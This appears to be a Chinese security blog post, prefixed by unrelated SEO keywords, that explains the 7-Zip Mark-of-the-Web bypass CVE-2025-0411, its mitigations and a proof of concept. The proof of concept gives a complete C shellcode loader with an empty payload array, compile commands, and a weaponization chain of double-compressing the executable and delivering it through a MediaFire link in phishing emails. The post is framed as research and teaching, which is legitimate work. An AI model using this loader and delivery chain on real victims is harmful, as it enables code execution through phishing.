网站简繁切换jswordpress的pdf阅读

网站简繁切换js,wordpress的pdf阅读,正规专业短期培训学校,三合一网站开发教程7-Zip Mark-of-the-Web 绕过漏洞 [CVE-2025-0411] - POC 漏洞简介 此漏洞#xff08;CVSS 评分为 7.0#xff09;允许远程攻击者绕过受影响 7-Zip 安装中的 Mark-of-the-Web#xff08;网络标记#xff09;保护机制。利用此漏洞需要用户交互#xff0c;即目标用户必须访问…7-Zip Mark-of-the-Web 绕过漏洞 [CVE-2025-0411] - POC漏洞简介此漏洞CVSS 评分为 7.0允许远程攻击者绕过受影响 7-Zip 安装中的 Mark-of-the-Web网络标记保护机制。利用此漏洞需要用户交互即目标用户必须访问恶意页面或打开恶意文件。具体缺陷存在于处理归档文件时。当从带有网络标记的特制存档中提取文件时7-Zip 不会将网络标记传播到提取的文件。攻击者可利用此漏洞在当前用户上下文中执行任意代码。受影响版本24.09之前的所有版本均被视为易受攻击。缓解措施更新 7-Zip从 7-Zip 官方网站下载并安装 24.09 或更高版本。谨慎处理不受信任的文件避免打开来自未知或可疑来源的文件尤其是压缩存档。利用安全功能确保您的操作系统和安全软件配置为检测和阻止恶意文件。概念验证 (POC)作为 POC 的一部分我们实现了一个简单的calc.exe加载器Shellcode Loader用于演示代码执行过程。加载器核心代码这是一个用 C 编写的 Windows Shellcode 加载器。它负责在内存中分配空间复制并执行 Shellcode。#includewindows.h#includestdio.h#includestdlib.h#includestring.hintmain(){DWORD oldprotect0;// 存放 Shellcode 的数组 (示例中为 calc.exe 的 Shellcode)unsignedcharp[]{//calc.exe shellcode};// 计算 Shellcode 长度unsignedintlensizeof(p);// 在进程中申请可读可写内存void*payload_memVirtualAlloc(0,len,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);// 将 Shellcode 复制到申请的内存中RtlMoveMemory(payload_mem,p,len);// 将内存保护属性修改为可执行防止 DEP 拦截BOOL rvVirtualProtect(payload_mem,len,PAGE_EXECUTE_READ,oldprotect);// 如果属性修改成功则创建线程执行 Shellcodeif(rv!0){HANDLE thCreateThread(0,0,(LPTHREAD_START_ROUTINE)payload_mem,0,0,0);// 等待线程执行完毕WaitForSingleObject(th,-1);}return0;}// 编译命令使用 MinGW-w64:// x86_64-w64-mingw32-g .\loader.cpp -o loader.exe -s漏洞利用方法利用方法是对可执行文件进行双重压缩从而触发漏洞。武器化将上述编译好的loader.exe进行两层压缩制作成 7z 文件。投递将双重压缩的 7z 文件上传到有效载荷投递服务器示例中为 MediaFire并通过钓鱼邮件等方式向受害者发送恶意链接。下载后文件会带有 “MotW”Zone.Identifier指示下载来源。执行受害者需要点击打开多层压缩文件并运行其中的可执行文件。已修复版本场景使用 7-Zip 24.09 版本已修复打开文件时会显示 Windows SmartScreen 警告提示此文件来自不受信任的来源因为它包含了 MotW。易受攻击版本场景使用 7-Zip 24.07 版本易受攻击打开文件时可以直接执行可执行文件而不显示任何警告因为提取的文件不包含 MotW。功能特性本 POC 项目演示了以下核心环节漏洞原理复现展示了 CVE-2025-0411 如何绕过系统安全机制。Shellcode 加载器提供了一个完整的、可直接编译的 Windows 内存 Shellcode 加载器示例。完整的攻击链模拟从载荷准备压缩到投递带 MotW 下载再到用户交互执行。版本对比说明清晰展示了漏洞修复前后的不同行为。安装与使用说明本 POC 主要用于安全研究与教学目的。环境要求Windows 操作系统一个易受攻击的 7-Zip 版本 (如 24.07)C/C 编译器 (如 MinGW-w64)用于编译加载器代码使用步骤编译加载器使用 MinGW-w64 编译提供的loader.cpp代码生成loader.exe。x86_64-w64-mingw32-g loader.cpp -o loader.exe -s制作恶意存档使用 7-Zip 24.07 版本将loader.exe压缩两次生成嵌套的.7z文件。模拟投递将生成的.7z文件放在一个 Web 服务器上或添加 Zone.Identifier 流以模拟从网络下载。测试漏洞在装有 7-Zip 24.07 的系统上下载并打开该存档观察文件是否能不经警告直接执行。免责声明此代码仅用于教育和授权测试。请勿将其用于非法活动。参考链接https://www.zerodayinitiative.com/advisories/ZDI-25-045/https://nvd.nist.gov/vuln/detail/CVE-2025-0411https://securityonline.info/cve-2025-0411-7-zip-security-vulnerability-enables-code-execution-update-now/更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享